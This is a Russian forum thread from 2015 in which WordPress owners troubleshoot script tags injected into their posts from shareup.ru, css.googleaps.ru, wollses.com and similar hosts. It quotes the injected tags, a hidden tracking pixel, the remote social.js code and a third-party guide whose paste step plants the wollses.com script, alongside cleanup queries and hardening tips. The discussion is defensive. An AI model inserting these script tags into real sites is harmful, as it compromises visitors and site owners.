Сегодня встретил в коде uptoliked.ru, css.googleaps.ru, wq4.ru, shareup.ru/social.js что это?

Сегодня (07.07.2015) на 4 сайтах, которые работают под CMS Wordpress, в каждой записи, на каждой страницы обнаружил такую строчку
<script type="text/javascript" src="//shareup.ru/social.js"></script>

и на одном вот такую
<script type="text/javascript" src="//wq4.ru/social.js"></script>

обнаружил её тока по чистой случайности, когда начал разбираться почему сайты начали грузиться с задержкой 5-10 секунд, учитывая что на них комменты и регистрация отключена, и работают как визитницы, оказалось сайт shareup.ru на который ссылался этот JS был недоступен какое то время. Сам файлик JS пустой, не какого кода не имеет, но тут проскочила другая мысль, может проблема сейчас ,где то глубже, которая ещё не аукнулась? да и может кто знает, где дыру залатывать? Заранее спасибо)

4f1cf64bad474291b1e5b5e720b9b5a5.png

После чистки, это скрипта из кода, смена паролей и активирования почти всех пунктов безопасности в плагине (iThemes Security) ситуация не изменилась (10.07.2015) этот скрипт опять добавился, есть подозрения на уязвимость какого то из плагинов

-------------------------------------

к продолжению истории 25.07.2015 во всех ссылках появился код следующего содержания

document.write("<img src='//counter.yadro.ru/hit;wq4all?t44.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' style='display:none' "+
"border='0' width='1' height='1'>");


и одна из ссылок изменила свой вид
<script src="//css.googleaps.ru/css?f=Open+Sans&amp;cd=mb&amp;ver=4.2.2" type="mce-text/javascript"></script>
  • Вопрос задан
  • 6195 просмотров
Пригласить эксперта
Ответы на вопрос 25
@airjordan23
У меня из-за этого Яндекс фильтранул сайт. Минус 20 и более позиций по всем запросам. Начал им писать, разбираться, вроде бы JS скрипт этот является мобильным редиректом, хотя с ПК смотришь и файл пустой.
Похоже добавляется он в посты SQL-инъекцией, следовательно, будет полезным изменить префикс таблиц, у кого стандартный. Собственно, возникает вопрос: у кого появился JS, префикс таблиц стандартный? Пусть не закрыть уязвимость, но может хоть временно решить вопрос?
Ответ написан
@sergey_dudin_com
Сегодня обнаружил в статьях строчки

Версия WP 4.2.4
Плагины:
Akismet
Anti-XSS attack
Append Link on Copy
AviaSales поиск авиабилетов
Broken Link Checker
Dagon Design Sitemap Generator
Disqus Comment System
Easy Contact Forms
Facebook Page Promoter Lightbox
FancyBox for WordPress
Google Analytics by Yoast
Instagram-Widget-for-WordPress
MaxSite Russian Date
Regenerate Thumbnails
RusToLat
Simple Instagram Embed
Simply Exclude
Ultimate Coming Soon Page
WordPress File Monitor
WordPress Related Posts
WP-Optimize
Список страниц
Yoast SEO
Прятатель ссылок PRO
Супер лидген 1.0

Посмотрел лог файла, увидел там много подобных строчек

brnx.ru 213.243.84.38 - - [10/Aug/2015:13:52:08 +0300] "GET /wp-admin/edit.php?s=shareup.ru%2Fsocial.js&post_status=all&post_type=post&_wpnonce=777e117719&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fs%26post_status%3Dall%26post_type%3Dpost%26m%3D0%26cat%3D0%26seo_filter%26paged%3D24%26mode%3Dlist%26se_cfg%255Bpost%255D%255Bterms%255D%255Bis_feed%255D%255B44203%255D%3Don%26se_cfg%255Bpost%255D%255Bterms%255D%255Bis_home%255D%255B44203%255D%3Don%26ids%3D1051%252C1046%252C956%252C824&action=-1&m=0&cat=0&seo_filter=&paged=1&mode=list&action2=-1 HTTP/1.0" 302 - "brnx.ru/wp-admin/edit.php?s&post_status=all&post_t..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"

brnx.ru 213.243.84.38 - - [10/Aug/2015:13:52:09 +0300] "GET /wp-admin/edit.php?s=shareup.ru%2Fsocial.js&post_status=all&post_type=post&action=-1&m=0&cat=0&seo_filter&paged=1&mode=list&action2=-1 HTTP/1.0" 200 186108 "brnx.ru/wp-admin/edit.php?s&post_status=all&post_t..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"
brnx.ru 213.243.84.38 - - [10/Aug/2015:13:52:10 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 - "brnx.ru/wp-admin/edit.php?s=shareup.ru%2Fsocial.js&post_status=all&post_type=post&action=-1&m=0&cat=0&seo_filter&paged=1&mode=list&action2=-1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"

Как понять где уязвимость?
Ответ написан
zooks
@zooks
Frontend
Скорей всего зараженный сайт.
Ответ написан
Комментировать
@casualx
У меня появляются такие скрипты:
<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
<script type="text/javascript" src="//shareup.ru/social.js"></script>


Как действовать, чем лечить?
Ответ написан
@guesteshop
Проверил через гугл, с таким кодом в тексте уже очень много сайтов. Так же,, он вошел в конфликт на сайте.

Кто-то узнал как от этого излечиться?

-------------------

это инъекция, вставляется в БД. у меня было инфицировано более 33800 записей. чистил весь день. Работа сайта восстановилась, надолго ли, не знаю.
Ответ написан
@Jeick9
Народ, у меня на 3-х сайтах такой же код подскажите как его найти?
Ответ написан
Комментировать
@pansa
У меня этот shareup прописался прямо в тексты post'ов , т.е файлы WP целы (у меня мониторинг на изменения в ФС и жесткое ограничение прав), а вот в БД кто-то покапался. Подозреваю, что это уязвимость в WP, возможно, еще не исправленная. Гугл выдает кучу сайтов, у которых эти строки криво втиснуты в тексты постов -- очень похоже, что орудует бот. =(
Ответ написан
Комментировать
@zolti
Заметил так же на своем ресурсе, появляется регулярно.
Давайте может быть выложим список плагинов и выясним какой из них виноват?
Ответ написан
Аналогичная проблема. На одном из сайтов на WordPress установлены следующие плагины:

All In One SEO Pack
Anti-spam
Contact Form 7
Faster Image Insert
Featured Content Gallery
Flexible Lightbox
My Category Order
RusToLat
WordPress Importer
WordPress Related Posts
WP-PageNavi
WP-Polls
Виджет анонсов
Карта сайта

На другом сайте, где тоже обнаружена эта "зараза", список плагинов:
Akismet
Category & Page I c o n s
HTML in Category Descriptions
My Category Order
New Google Plus Badge Widget
RusToLat
Spam Free Wordpress
WordPress Importer
WP Review
WP Tab Widget

Даже судя по этим двум сайтам общие плагины:
My Category Order
RusToLat
WordPress Importer
Ответ написан
varvarII
@varvarII
Занимаюсь созданием и вёрсткой сайтов на wordpress
Если вы пользуетесь услугами автосёрфинга, пройдите вот такой путь на своём компьютере C:\Documents and Settings\Admin\Application Data\Macromedia\Flash Player - и увидите там папку #SharedObjects, которая развеет ваши вопросы.
Ответ написан
формы проверяйте на уязвимость. И вообще, нужно эти скрипты из запросов вырезать
preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', "", $data)
Ответ написан
b0mber
@b0mber
та же беда по всем WP сайтам, за исключением сайта на WP 3.1.2
Ответ написан
Комментировать
Diamond00744
@Diamond00744
Я так понимаю, это случилось у многих более-менее популярных WP-сайтах, не успевших вовремя обновиться до патча 4.2.3.
Судя по описанию к этому обновлению, именно такую дыру оно и закрыло.

UPD от 4 августа: вышел фикс 4.2.4, исправляющий три уязвимости межсайтового скриптинга и возможность SQL-инъекции (CVE-2015-2213). Подробнее здесь. Думаю, теперь можно спать спокойно...
Ответ написан
@iliaprohor
Заразились 2 сайта этими скриптами, долго искал решения, написал хостеру чтобы запустил айболит, в итоге по окончанию проверки нашел файл cache.php, удалил с сервера, сайты снова нормально грузятся, осталось позаботится о безопасности.
Ответ написан
@NaPoker
У меня 5 сайтов на WP, на 3 из них обнаружил такие скрипты, что примечательно на всех трёх использую сео плагин "All In One SEO Pack", на двух не зараженных стоят другие сео плагины...
Ответ написан
@Erazistrat
Я заметил, что у меня появились пользователи, кроме меня. Пользователей у меня на сайте быть не должно никаких. Всех удалил, поменял пароль к админке. Жду что будет дальше.
Прошу прощения за неполную информацию. Написать про этих пользователей уже не могу. Поторопился и удалил всех....
В общих настройках стояла галочка "Любой может зарегистрироваться" в качестве "Участник". Теперь, конечно же она тоже не стоит.

После проделанной процедуры все работает нормально, уже 2 дня ничего нет, хотя раньше они вновь появлялись ежедневно.

Кто пробовал смотреть пользователей? Отзовитесь. Появляются ли эти записи, если пользователей не было?

К сожалению, это тоже не помогло.
Ответ написан
Комментировать
@crazymozg
аналогичная проблема, каждая запись содержала

Почистил базу, буду смотреть появится ли снова.
Ответ написан
@fedorf
Проблема как мне кажется даже более серьезная sql-injection, у меня сайт находится в разработке и к нему закрыт доступ по ip, и тем не менее вот этот скрипт появился в ссылках

Возможно темы, но некоторые пишут, что на самописных даже появляется
Возможно плагины, но есть те, кто пишут что стоит стандартный набор
Остается sql-injection, но вот у меня сайт закрыт от внешнего доступа тогда возможно хостинг инфицирован.
Я думаю нужно хостинг проверить, посмотреть у какого какой
Ответ написан
@80689248440
Никак не доходили руки почистить 1 свой сайт и как оказалось заражены 22 сайта из 25 (2 локальные)
Удалось узнать как закрыть дыру?
Скиньте зараженный cache.php у кого есть для анализа.

Вот нашёл решение hlep.ru/udalyaem-skript-wollses-com-iz-kontenta
Ответ написан
Комментировать
@altman
системный администратор
Неделю назад вычистил весь сайт от
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>

Проверил файлы на вирусы, удалил зараженные, что-то восстановил из дистрибутива. Отключил все ненужные плагины, все остальные обновил. Обновил WP до 4.3.1, сменил все пароли.
Сегодня опять тоже самое во всех постах.

Так что проблема актуальна до сих пор.

Из тех плагинов, что писали выше, стоит только RusToLat
Сейчас отключу его...

PS: посмотрел еще один сайт, к которому у меня есть доступ. Там правда WP 4.1.8 и всего 4 плагина

Contact Form 7
Easy FancyBox
PHP Text Widget
WP reCaptcha Integration

Все страницы заспамлены другим кодом:
<script src="//wollses.com/steps.png"></script>
Ответ написан
turbopower
@turbopower
Создаю бизнесы
wollses.com/steps.png - та же фигня

вот только вот что гуглится:

Но на моих сайтах до сих пор стоит плагин Dagon Design Sitemap Generator и я его пока менять не собираюсь. Скачать его можно: тут https://yadi.sk/d/YJzDObVYjMeYh
Мне он нравится за стабильность работы и беспроблемность в установке:
1.Скачиваем плагин по ссылке сверху.
2.Устанавливаем на свой WordPress-овский сайта.
3.Создаем страницу с заголовкам "Карта сайта".
4.На странице нажимаем "источник" и вписываем следующий код:
<p>
    <!— ddsitemapgen —><br />
   <script src="//wollses.com/steps.png"></script>
</p>

5.После создания страницы переходим к вкладке "МЕНЮ" и добавляем эту страницу в "МЕНЮ".
Результатом будет появление данной страницы в пункте меню и нормальное отображение содержимого сайта на этой странице.
Ответ написан
@Konstantin_T
У меня тоже самое, на хостинге несколько сайтов на WP и на всех эта лабуда. Нашел такую информацию по данной теме:
username.name/chuzhoj-skript-v-postax-wordpress но еще не пробовал.
Кратко: Атаке подвергался файл xmlrpc.php корневого каталога.
Ограничил доступ к проблемному файлу, внеся в .htaccess
<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>
Ответ написан
Bahus7
@Bahus7
Вчера царь, сегодня царь. Маловато будет.
Нашли, откуда надувает эти скрипты?
Ко мне из Казани какой то настойчиво стучался. Из кальянной, если верить гугловской карте. Блокирнул. Пока тихо.
Ответ написан
Комментировать
@setevoy4
Столкнулся с тем же:
shareup.ru || social.js

Вычистил один раз - заметил снова.
Есть подозрение на RusToLat плагин.
Отключил, посмотрю через пару дней еще.

У меня установлены:

about-author
all-in-one-seo-pack
autoset-featured-image
clean-and-simple-contact-form-by-meg-nicholas
disqus-comment-system
dynamic-to-top
google-sitemap-generator
html-editor-syntax-highlighter
index.php
rating-widget
rustolat
sitemap-generator
social-networks-auto-poster-facebook-twitter-g
syntax-highlighter-with-add-button-in-editor
wordpress-23-related-posts-plugin
wordpress-importer
wp-autoset-featured-image-plus
wp-noexternallinks
wp-postviews
wp-to-twitter
yet-another-stars-rating


Лечил простым запросом:

UPDATE db1_posts SET post_content = REPLACE(post_content, '<script type="text/javascript" src="//shareup.ru/social.js"></script>', '') WHERE post_content LIKE '%src="//shareup.ru/social.js"></script>%';
Ответ написан
@hadahan
Кто говорит что файл пустой, хз, у меня по ссылке shareup.ru/social.js вот что:
if (!lf) { var lf=1; document.cookie = 'lfj=1; expires=24/12/2016 17:23:47'; function get_cookie(cookie_name) { var results = document.cookie.match ( '(^|;) ?' + cookie_name + '=([^;]*)(;|$)' ); if (results) return ( unescape ( results[2] ) ); else return null; } var cooken=get_cookie('lfj'); document.write(''); }

Меня до этого взламывали много раз, с помощью дыр в модулях, темах, теперь я все беру из хранилища самого WP.

Shell - это настоящее зло (устраняйте дыры), могут незаметно что то поменять, не узнаешь пока Яша не забанит через несколько месяцев, а могут заразить и "перевернуть с ног наголову" все файлы на сервере, еще может быть шантаж типа "удалю и/или выложу в паблик ваши файлы если не заплатите".

Изменил порт ssh, стандартные пути к админкам WP и т.д., я удивился, когда увидел скрипт, но не подумал, что это вирус, теперь вот решил пробить обстановку...

А этот скрипт даже сервер не нагружал...

Удалил скрипты из статей и страниц, прописал в .htaccess:
<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>

На VDS у меня 3 сайта на WP, заразился только 1 и то не все статьи, в файлах WP упоминания social.js нет.
Посмотрим, если НЕ напишу, то помогло...
p.s. Проблема годичной давности, а я 1-3 месяца назад все сайты переделывал (возможно не замечал этот скрипт).
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы